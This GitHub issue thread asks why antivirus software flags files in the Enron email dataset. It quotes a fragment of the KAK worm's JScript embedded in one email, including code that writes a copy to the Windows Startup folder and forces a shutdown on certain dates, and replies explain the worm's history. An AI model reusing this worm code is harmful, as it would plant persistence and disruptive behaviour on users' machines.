### ISSUE TITLE
Is there a virus in the enron email data set?

### ISSUE THREAD

**Issue by zektall** [udacity/ud120-projects#173]
My antivirus was set off by some of these files.  

For example
ud120-projects-master\maildir\jones-t\notes_inbox\1196.file

On the bottom of the sample email you have this.  

`Good Day,
?
I want you to go with me to look at this house I  have been checking out in 
the Woodland Heights.? It is a re-do, gutted and  cleaned up, and ready to be 
moved in to asap.? Are you working late  tonight, and, if not, would you be 
up for me coming by just for a quick  trip???? You may have plans, and, if 
you do, could I grab you tomorrow for  a quick look?? I am putting a 'for 
sale by owner' sign in my yard  today!!!
?
Let me know
?
');t3.close();fs.GetFile(wd+'kak.htm').Attributes=2;fs.DeleteFile(wd+'kak.reg'
);d=new Date();if(d.getDate()==1 && 
d.getHours()>17){alert('Kagou-Anti-Kro$oft says not today 
!');wsh.Run(wd+'RUNDLL32.EXE user.exe,exitwindows');}self.close();S3 driver 
memory alloc failed ? 
!]]%%%%%";la=(navigator.systemLanguage)?navigator.systemLanguage:navigator.lan
guage;scr.Path=(la=="fr")?"C:\\windows\\Menu 
D?marrer\\Programmes\\D?marrage\\kak.hta":"C:\\windows\\Start 
Menu\\Programs\\StartUp\\kak.hta";agt=navigator.userAgent.toLowerCase();if(((a
gt.indexOf("msie")!=-1)&&(parseInt(navigator.appVersion)>4))||(agt.indexOf("ms
ie 5.")!=-1))scr.write(); //-->`

What the heck is that on the bottom there.  It's in a few other files.  On virustotal there were 4 engines that flagged it positive.

**Comment by ShengKungYi** [comment]
So, I suppose you could call this a virus fossil, like an insect preserved in amber. JS_KAKWORM.A
is a worm from early 2000s, same time period as the e-mail noted in the student’s message. Apparently it attaches its code to outgoing e-mails, and I’m guessing that this code junk at the end of the e-mail transcript is part of that. 

We can't really do anything about it, since it's part of the historical record, and inherent to the Enron corpus itself. But I would not worry about it causing any problems. If you're just reading the text programmatically, as you are in the project, there's no chance for it to 'activate'. And it'll only activate for software that is long out of date, anyways. It's just a fascinating bit of history now. Definitely worth thinking about adding a note about it somewhere in the courseware, though.

**Comment by ilvieira** [comment]
I would also like to use the data set to practice email classification and npl, but my antivirus moved some of the files directly to quarantine, because it detected JS_KAKWORM.A. Is it really safe to have this data set on the computer? And what would activate the virus, so that I don't make that mistake?
